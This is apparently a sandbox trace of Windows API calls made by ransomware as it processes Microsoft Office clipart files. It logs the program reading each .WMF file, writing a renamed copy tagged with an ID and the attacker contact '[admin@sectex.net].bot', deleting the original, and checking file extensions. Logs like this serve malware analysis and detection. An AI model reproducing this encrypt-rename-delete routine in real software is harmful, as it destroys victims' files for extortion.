	[0144.402] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.405] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.405] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01146_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c
	[0144.418] GetLastError () returned 0x0
	[0144.418] ReadFile (in: hFile=0x388, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0xaec, lpOverlapped=0x0) returned 1
	[0144.500] WriteFile (in: hFile=0x39c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xaf0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xaf0, lpOverlapped=0x0) returned 1
	[0144.501] ReadFile (in: hFile=0x388, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.501] WriteFile (in: hFile=0x39c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0144.501] SetEndOfFile (hFile=0x39c) returned 1
	[0144.501] CloseHandle (hObject=0x39c) returned 1
	[0144.501] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.501] SetEndOfFile (hFile=0x388) returned 1
	[0144.503] CloseHandle (hObject=0x388) returned 1
	[0144.503] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.504] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01146_.wmf")) returned 1
	[0144.505] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 63
	[0144.505] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 63
	[0144.505] lstrlenW (lpString=".doc") returned 4
	[0144.505] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.505] lstrlenW (lpString=".docx") returned 5
	[0144.505] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.505] lstrlenW (lpString=".pdf") returned 4
	[0144.506] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.506] lstrlenW (lpString=".xls") returned 4
	[0144.506] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.506] lstrlenW (lpString=".xlsx") returned 5
	[0144.506] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.506] lstrlenW (lpString=".ppt") returned 4
	[0144.506] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.506] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 63
	[0144.506] lstrlenW (lpString=".zip") returned 4
	[0144.506] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.506] lstrlenW (lpString=".rar") returned 4
	[0144.506] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.506] lstrlenW (lpString=".bz2") returned 4
	[0144.506] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.506] lstrlenW (lpString=".7z") returned 3
	[0144.506] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.506] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 63
	[0144.506] lstrlenW (lpString=".dbf") returned 4
	[0144.506] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.506] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 63
	[0144.506] lstrlenW (lpString=".1cd") returned 4
	[0144.506] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.506] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 63
	[0144.506] lstrlenW (lpString=".jpg") returned 4
	[0144.506] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.506] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 63
	[0144.506] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 63
	[0144.506] lstrlenW (lpString=".doc") returned 4
	[0144.506] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.506] lstrlenW (lpString=".docx") returned 5
	[0144.506] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.506] lstrlenW (lpString=".pdf") returned 4
	[0144.507] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.507] lstrlenW (lpString=".xls") returned 4
	[0144.507] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.507] lstrlenW (lpString=".xlsx") returned 5
	[0144.507] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.507] lstrlenW (lpString=".ppt") returned 4
	[0144.507] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.507] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 63
	[0144.507] lstrlenW (lpString=".zip") returned 4
	[0144.507] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.507] lstrlenW (lpString=".rar") returned 4
	[0144.507] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.507] lstrlenW (lpString=".bz2") returned 4
	[0144.507] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.507] lstrlenW (lpString=".7z") returned 3
	[0144.507] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.507] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 63
	[0144.507] lstrlenW (lpString=".dbf") returned 4
	[0144.507] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.507] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 63
	[0144.507] lstrlenW (lpString=".1cd") returned 4
	[0144.507] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.507] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 63
	[0144.507] lstrlenW (lpString=".jpg") returned 4
	[0144.507] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.507] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0144.507] lstrlenW (lpString="DD01157_.WMF") returned 12
	[0144.507] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01157_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0144.537] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=3588) returned 1
	[0144.537] CloseHandle (hObject=0x25c) returned 1
	[0144.537] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01157_.wmf")) returned 0x20
	[0144.610] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01157_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.610] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01157_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0144.610] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.610] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.610] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01157_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0144.611] GetLastError () returned 0x0
	[0144.611] ReadFile (in: hFile=0x398, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0xe04, lpOverlapped=0x0) returned 1
	[0144.620] WriteFile (in: hFile=0x384, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xe10, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xe10, lpOverlapped=0x0) returned 1
	[0144.621] ReadFile (in: hFile=0x398, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.621] WriteFile (in: hFile=0x384, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0144.621] SetEndOfFile (hFile=0x384) returned 1
	[0144.621] CloseHandle (hObject=0x384) returned 1
	[0144.621] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.621] SetEndOfFile (hFile=0x398) returned 1
	[0144.623] CloseHandle (hObject=0x398) returned 1
	[0144.623] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.624] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01157_.wmf")) returned 1
	[0144.624] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 63
	[0144.624] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 63
	[0144.624] lstrlenW (lpString=".doc") returned 4
	[0144.624] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.624] lstrlenW (lpString=".docx") returned 5
	[0144.624] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.624] lstrlenW (lpString=".pdf") returned 4
	[0144.624] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.624] lstrlenW (lpString=".xls") returned 4
	[0144.624] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.624] lstrlenW (lpString=".xlsx") returned 5
	[0144.624] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.624] lstrlenW (lpString=".ppt") returned 4
	[0144.625] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.625] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 63
	[0144.625] lstrlenW (lpString=".zip") returned 4
	[0144.625] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.625] lstrlenW (lpString=".rar") returned 4
	[0144.625] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.625] lstrlenW (lpString=".bz2") returned 4
	[0144.625] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.625] lstrlenW (lpString=".7z") returned 3
	[0144.625] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.625] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 63
	[0144.625] lstrlenW (lpString=".dbf") returned 4
	[0144.625] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.625] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 63
	[0144.625] lstrlenW (lpString=".1cd") returned 4
	[0144.625] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.625] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 63
	[0144.625] lstrlenW (lpString=".jpg") returned 4
	[0144.625] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.625] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 63
	[0144.625] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 63
	[0144.625] lstrlenW (lpString=".doc") returned 4
	[0144.625] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.625] lstrlenW (lpString=".docx") returned 5
	[0144.625] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.625] lstrlenW (lpString=".pdf") returned 4
	[0144.625] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.625] lstrlenW (lpString=".xls") returned 4
	[0144.625] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.625] lstrlenW (lpString=".xlsx") returned 5
	[0144.625] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.625] lstrlenW (lpString=".ppt") returned 4
	[0144.625] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.626] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 63
	[0144.626] lstrlenW (lpString=".zip") returned 4
	[0144.626] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.626] lstrlenW (lpString=".rar") returned 4
	[0144.626] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.626] lstrlenW (lpString=".bz2") returned 4
	[0144.626] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.626] lstrlenW (lpString=".7z") returned 3
	[0144.626] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.626] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 63
	[0144.626] lstrlenW (lpString=".dbf") returned 4
	[0144.626] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.626] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 63
	[0144.626] lstrlenW (lpString=".1cd") returned 4
	[0144.626] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.626] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 63
	[0144.626] lstrlenW (lpString=".jpg") returned 4
	[0144.626] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.626] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0144.626] lstrlenW (lpString="DD01169_.WMF") returned 12
	[0144.626] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01169_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0144.707] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=2020) returned 1
	[0144.707] CloseHandle (hObject=0x31c) returned 1
	[0144.707] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01169_.wmf")) returned 0x20
	[0144.928] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01169_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.928] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01169_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0144.929] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.929] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.929] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01169_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0144.929] GetLastError () returned 0x0
	[0144.929] ReadFile (in: hFile=0x38c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x7e4, lpOverlapped=0x0) returned 1
	[0144.955] WriteFile (in: hFile=0x3b0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x7f0, lpOverlapped=0x0) returned 1
	[0144.956] ReadFile (in: hFile=0x38c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.956] WriteFile (in: hFile=0x3b0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0144.956] SetEndOfFile (hFile=0x3b0) returned 1
	[0144.956] CloseHandle (hObject=0x3b0) returned 1
	[0144.956] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.956] SetEndOfFile (hFile=0x38c) returned 1
	[0144.958] CloseHandle (hObject=0x38c) returned 1
	[0144.959] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.968] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01169_.wmf")) returned 1
	[0144.976] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 63
	[0144.976] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 63
	[0144.976] lstrlenW (lpString=".doc") returned 4
	[0144.976] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.976] lstrlenW (lpString=".docx") returned 5
	[0144.977] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.977] lstrlenW (lpString=".pdf") returned 4
	[0144.977] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.977] lstrlenW (lpString=".xls") returned 4
	[0144.977] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.977] lstrlenW (lpString=".xlsx") returned 5
	[0144.977] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.977] lstrlenW (lpString=".ppt") returned 4
	[0144.977] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.977] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 63
	[0144.977] lstrlenW (lpString=".zip") returned 4
	[0144.977] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.977] lstrlenW (lpString=".rar") returned 4
	[0144.977] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.977] lstrlenW (lpString=".bz2") returned 4
	[0144.977] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.977] lstrlenW (lpString=".7z") returned 3
	[0144.977] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.977] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 63
	[0144.977] lstrlenW (lpString=".dbf") returned 4
	[0144.977] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.977] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 63
	[0144.977] lstrlenW (lpString=".1cd") returned 4
	[0144.977] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.977] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 63
	[0144.977] lstrlenW (lpString=".jpg") returned 4
	[0144.977] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.977] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 63
	[0144.977] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 63
	[0144.977] lstrlenW (lpString=".doc") returned 4
	[0144.977] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.978] lstrlenW (lpString=".docx") returned 5
	[0144.978] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.978] lstrlenW (lpString=".pdf") returned 4
	[0144.978] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.978] lstrlenW (lpString=".xls") returned 4
	[0144.978] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.978] lstrlenW (lpString=".xlsx") returned 5
	[0144.978] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.978] lstrlenW (lpString=".ppt") returned 4
	[0144.978] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.978] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 63
	[0144.978] lstrlenW (lpString=".zip") returned 4
	[0144.978] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.978] lstrlenW (lpString=".rar") returned 4
	[0144.978] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.978] lstrlenW (lpString=".bz2") returned 4
	[0144.978] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.978] lstrlenW (lpString=".7z") returned 3
	[0144.978] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.978] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 63
	[0144.978] lstrlenW (lpString=".dbf") returned 4
	[0144.978] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.978] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 63
	[0144.979] lstrlenW (lpString=".1cd") returned 4
	[0144.979] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 63
	[0144.979] lstrlenW (lpString=".jpg") returned 4
	[0144.979] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.979] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0144.979] lstrlenW (lpString="DD01178_.WMF") returned 12
	[0144.979] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01178_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c
	[0144.979] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=3796) returned 1
	[0144.979] CloseHandle (hObject=0x39c) returned 1
	[0144.979] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01178_.wmf")) returned 0x20
	[0144.979] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01178_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.980] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01178_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c
	[0144.980] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.980] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
